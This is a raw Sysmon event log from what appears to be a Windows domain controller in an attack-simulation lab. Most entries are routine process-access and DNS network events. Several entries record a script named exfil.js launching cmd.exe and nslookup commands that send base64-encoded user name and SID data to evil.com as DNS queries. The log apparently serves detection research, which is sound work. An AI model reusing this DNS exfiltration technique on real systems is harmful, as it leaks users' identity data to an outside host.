14:21:42.338{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.338{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.338{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.338{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-2145-000000005F02}4040C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.338{2E1864BB-18F6-629A-1F45-000000005F02}35368100C:\Windows\system32\cmd.exe{2E1864BB-18F6-629A-2145-000000005F02}4040C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.342{2E1864BB-18F6-629A-2145-000000005F02}4040C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F6-629A-1F45-000000005F02}3536C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnwpx.tmp 2>&1 10341000x8000000000000000212615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.306{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F6-629A-2045-000000005F02}3968C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.306{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F6-629A-2045-000000005F02}3968C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.306{2E1864BB-18F6-629A-2045-000000005F02}39685168C:\Windows\system32\conhost.exe{2E1864BB-18F6-629A-1F45-000000005F02}3536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.291{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-2045-000000005F02}3968C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.287{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.287{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.287{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.287{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.287{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-1F45-000000005F02}3536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.286{2E1864BB-18E0-629A-6742-000000005F02}39766864C:\Windows\System32\WScript.exe{2E1864BB-18F6-629A-1F45-000000005F02}3536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.286{2E1864BB-18F6-629A-1F45-000000005F02}3536C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnwpx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.269{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnxkxa.tmpMD5=FB87DC05AA42B3CEFD4C629E53F524B0,SHA256=D8FD32DBA2A6AFDF9B6B8FFC9EECC534FF5A98DB8AFE74AF80C8BC0F2B8F0CBD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.238{2E1864BB-18F6-629A-1D45-000000005F02}64087204C:\Windows\system32\conhost.exe{2E1864BB-18F6-629A-1E45-000000005F02}3868C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.238{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.238{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.238{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.238{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.238{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-1E45-000000005F02}3868C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.238{2E1864BB-18F6-629A-1C45-000000005F02}68881144C:\Windows\system32\cmd.exe{2E1864BB-18F6-629A-1E45-000000005F02}3868C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.240{2E1864BB-18F6-629A-1E45-000000005F02}3868C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F6-629A-1C45-000000005F02}6888C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnxkxa.tmp 2>&1 354300x8000000000000000212595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.799{00000000-0000-0000-0000-000000000000}488<unknown process>-udpfalsefalse127.0.0.1-51012-false127.0.0.1-53domain 354300x8000000000000000212594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.798{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51012- 354300x8000000000000000212593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.798{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51011- 354300x8000000000000000212592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.798{00000000-0000-0000-0000-000000000000}488<unknown process>-udptruefalse127.0.0.1-51011-false127.0.0.1-53domain 354300x8000000000000000212591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.797{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51010- 354300x8000000000000000212590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.778{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local56426-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000212589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.778{2E1864BB-E14E-6299-2B00-000000005F02}1040C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local56426-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000212588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.728{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51009- 354300x8000000000000000212587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.728{00000000-0000-0000-0000-000000000000}8104<unknown process>-udpfalsefalse127.0.0.1-51008-false127.0.0.1-53domain 354300x8000000000000000212586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.728{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51008- 354300x8000000000000000212585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.728{00000000-0000-0000-0000-000000000000}8104<unknown process>-udptruefalse127.0.0.1-51008-false127.0.0.1-53domain 354300x8000000000000000212584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.728{00000000-0000-0000-0000-000000000000}8104<unknown process>-udpfalsefalse127.0.0.1-51007-false127.0.0.1-53domain 354300x8000000000000000212583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.728{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51007- 354300x8000000000000000212582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.727{00000000-0000-0000-0000-000000000000}8104<unknown process>-udptruefalse127.0.0.1-51007-false127.0.0.1-53domain 354300x8000000000000000212581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.628{00000000-0000-0000-0000-000000000000}3864<unknown process>-udpfalsefalse127.0.0.1-51006-false127.0.0.1-53domain 354300x8000000000000000212580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.628{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51006- 